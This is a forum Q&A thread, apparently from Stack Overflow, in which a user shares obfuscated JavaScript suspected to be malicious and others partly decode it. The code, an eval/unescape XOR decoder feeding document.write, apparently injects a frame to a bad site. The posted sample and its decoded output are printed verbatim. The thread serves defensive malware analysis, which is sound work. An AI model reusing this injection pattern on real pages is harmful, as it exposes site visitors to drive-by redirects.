5

I have encountered some java script code which I believe is malicious but most of it is obfuscated. I was wondering if someone could help me figure out what this code actually does.

eval(unescape('function n48ec61ae(s) {
    var r = "";
    var tmp = s.split("12113781");
    s = unescape(tmp[0]);
    k = unescape(tmp[1] + "608421");
    for( var i = 0; i < s.length; i++) {
        r += String.fromCharCode((parseInt(k.charAt(i%k.length))^s.charCodeAt(i))+-4);
    }
    return r;
}
'));
eval(unescape('document.write(n48ec61ae('') + 'GoqwpF@dmgiEFxipviJBkSbzbjxy,_WMD1yj{yoBFqa|g%ufxoA"go}swtip%-asvporpE$'EF3hachJAmulwisa~$^WYVF%<24-8(&,BQWOJ_G&0."J^ASHAP_NIRI 4. HWBR@QTAOKRCE$5!A@n~cqa PDVJH xw| $_RE@!oq~t:;5{s0ram`axsau2ows2ulaoizm6<21wnkdpicp5hx6vms@q042enA1?7+5=0oI $ZWTHPNWOBFj~ash#QLWIE.nsyaos5kl~& _PGI"ggtzq8ftmto. SDQHDT[I@^LI"6'#RLPKIZJIEONYF%= $SOPSXTOSLB/TS",LVMUKGTUAOVE.2&,VQWNTDXIF@;ntdvj~oxFHtsbrgpntKF3v{lvmukvEF3hpwpJ121137817396048' + unescape(''));'));
// -->

Just as a reminder DO NOT EXECUTE THIS CODE.

njvb
  • 1,377
  • 3
  • 18
  • 36
  • 1
    Unless there's a bug in the javascript parsing functions, `n48..()` seems safe to run. There are however bugs in the second line which make it impossible to run (without eval of course). Seems to want to insert an iframe to a bad site, but I could only extract part of the url by removing the `'`s in `Goq...` and passing that as an arg through `n48...(s)`. – ninjagecko Jun 29 '11 at 02:59
  • Well I'm not entirely sure since I have no script it gives me this in html comments and a blank page with this line at the bottom I have a friend who went there on accident and wanted me to check it, but I still don't trust it. – njvb Jun 29 '11 at 03:26
  • It doesn't seem to do a great deal in chrome ... Unless i did something wrong. It seemed to write a bunch of garbage to my screen. that was it. – James Khoury Jun 29 '11 at 06:04
  • 1
    ninjagecko is right - it tries to print something like: D^ikiCC{fuleJFiOfz\g{v!USEH3u^{wjAAtcx_)oblg?\hpqsl]r!!amsshwrAI\a]eI>`oho]q]rXRZQK828'4*?RPBH[?*2*&JX7jl{pD" – eapen Jun 29 '11 at 06:38
  • well yeah document.write is pretty straight forward, but what it is trying to print may contain a malicious script tag and I'm not sure if this is just gibberish or actually executable obfuscated code. – njvb Jun 29 '11 at 15:20

1 Answers1

3

Silly rabbit... tricks are for virtual machine images which you were planning on discarding anyway...

I've spent a good deal of time on this and I think I can confirm that this is so obfuscated that it can't do anything anymore.

You'll get this:

<html>D`i]eI>vdsq\H>kW^v`fly*ZLJI3ujouk@BuazbrkzkA&ckwo{lgm*dqrpcnl? +=@.k^fjFAaqhmewax!UPLLB0.0'4*?RPBH[?*,* FRAMEBORDER=0$<O<OCNYCKKV?A1%A>ku\tcPHRFJlozXW?<!cmzn6/-un3mdg\alo]o.com/nkdeeza280-{feasffr1hl2rgoDq.11bcC-7;'17,cI!YPYJLF[K><frame NAME="jo{]cs3fgy+"[PKE]cxzo5]s`nk&$O@SDHLUDCYAK.+NFL?ITGJBBDU>)9OCPMUOHVF>'XO&HZESF<SXCKNI*.(ZQQKOCMKB@/jp^r^viu=Gyq^rkljnGJ3pvgq`ognIB/jl{pD

The problem is that another function is needed to unscramble this. Notice how it has <html> as well as FRAMEBORDER=, and <frame? That means that there is something which is able to break this up into chunks and reassemble it. The fact that there are so much noise also suggests that there is a function which further decrypts this beyond the scope of n48ec61ae.

cwallenpoole
  • 79,954
  • 26
  • 128
  • 166
  • Thanks, I suppose I would get it if I disabled noscript but I don't trust it to do that. – njvb Jul 01 '11 at 20:54
  • 1
    Oh no problem. I actually happened to have a virtual machine I was about to delete anyway, so I took a few minutes, booted, and tried it. – cwallenpoole Jul 01 '11 at 21:55